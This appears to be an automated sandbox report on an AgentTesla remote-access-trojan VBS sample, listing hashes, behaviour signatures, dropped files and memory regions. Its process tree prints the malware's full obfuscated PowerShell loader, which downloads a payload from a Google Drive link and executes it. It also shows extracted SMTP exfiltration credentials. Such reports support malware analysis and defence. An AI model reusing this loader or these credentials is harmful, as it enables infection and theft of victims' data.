Analysis
-
max time kernel
143s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
23-05-2024 14:46
General
-
Target
836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6.vbs
-
Size
5KB
-
MD5
4f71bc91cc015856a2a5029d880f02f0
-
SHA1
3f9e609f67057c573a15f469e4bb5e64c571174c
-
SHA256
836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6
-
SHA512
30de245e61fd2cf7462a9e4949a04acfd17da6ffd074886d440b11f76bc4c28b336a9a5ced2785695fa8049348cc152d35b43ab487ff193e6f001a3d23243c38
-
SSDEEP
96:Q7ZrI+0JYJMAAiOL1vOZypNWiu/hlbz9cZh+xFUMLCT0MTUmdrQfp:Q150+GAAlOZypNWiu/hlPahKLCQMUhfp
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.blachownia.pl - Port:
587 - Username:
[email protected] - Password:
Zamowienia-2017 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_30qvxfrc.yvs.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Ruhaarede.TalFilesize
486KB
MD51bfa03c6f53315482c87ac075d5e4898
SHA1e2252b3662c2989cef2233e1d5fa7554bf8e5bd8
SHA256806ff71ceaf81fe7073d40617e7ccb34e4e9430fcccb5469c88e195e3c68eaf2
SHA51247e7a36d739e740f0b2d89694c1c670315b9efc29c4a710ddfab5f6aa2cdcbaaad605eec17ef33e3b53c2023a112eb2de09c3be6c2f6e59df404d337e68255a8
-
memory/2412-62-0x00000000230A0000-0x00000000230AA000-memory.dmpFilesize
40KB
-
memory/2412-61-0x00000000231A0000-0x0000000023232000-memory.dmpFilesize
584KB
-
memory/2412-60-0x00000000230B0000-0x0000000023100000-memory.dmpFilesize
320KB
-
memory/2412-55-0x0000000000C20000-0x0000000000C62000-memory.dmpFilesize
264KB
-
memory/2412-54-0x0000000000C20000-0x0000000001E74000-memory.dmpFilesize
18.3MB
-
memory/2552-33-0x0000000006190000-0x00000000061AA000-memory.dmpFilesize
104KB
-
memory/2552-17-0x00000000053B0000-0x00000000053D2000-memory.dmpFilesize
136KB
-
memory/2552-18-0x0000000005550000-0x00000000055B6000-memory.dmpFilesize
408KB
-
memory/2552-29-0x0000000005810000-0x0000000005B64000-memory.dmpFilesize
3.3MB
-
memory/2552-30-0x0000000005BF0000-0x0000000005C0E000-memory.dmpFilesize
120KB
-
memory/2552-31-0x0000000005C30000-0x0000000005C7C000-memory.dmpFilesize
304KB
-
memory/2552-32-0x0000000007440000-0x0000000007ABA000-memory.dmpFilesize
6.5MB
-
memory/2552-15-0x0000000004640000-0x0000000004676000-memory.dmpFilesize
216KB
-
memory/2552-34-0x0000000006EA0000-0x0000000006F36000-memory.dmpFilesize
600KB
-
memory/2552-35-0x0000000006E30000-0x0000000006E52000-memory.dmpFilesize
136KB
-
memory/2552-36-0x0000000008070000-0x0000000008614000-memory.dmpFilesize
5.6MB
-
memory/2552-19-0x00000000055C0000-0x0000000005626000-memory.dmpFilesize
408KB
-
memory/2552-38-0x0000000008620000-0x000000000B6B1000-memory.dmpFilesize
48.6MB
-
memory/2552-16-0x0000000004CD0000-0x00000000052F8000-memory.dmpFilesize
6.2MB
-
memory/3952-40-0x00007FF841313000-0x00007FF841315000-memory.dmpFilesize
8KB
-
memory/3952-39-0x00007FF841310000-0x00007FF841DD1000-memory.dmpFilesize
10.8MB
-
memory/3952-0-0x00007FF841313000-0x00007FF841315000-memory.dmpFilesize
8KB
-
memory/3952-58-0x00007FF841310000-0x00007FF841DD1000-memory.dmpFilesize
10.8MB
-
memory/3952-12-0x00007FF841310000-0x00007FF841DD1000-memory.dmpFilesize
10.8MB
-
memory/3952-11-0x0000015B3D8E0000-0x0000015B3D902000-memory.dmpFilesize
136KB
-
memory/3952-1-0x00007FF841310000-0x00007FF841DD1000-memory.dmpFilesize
10.8MB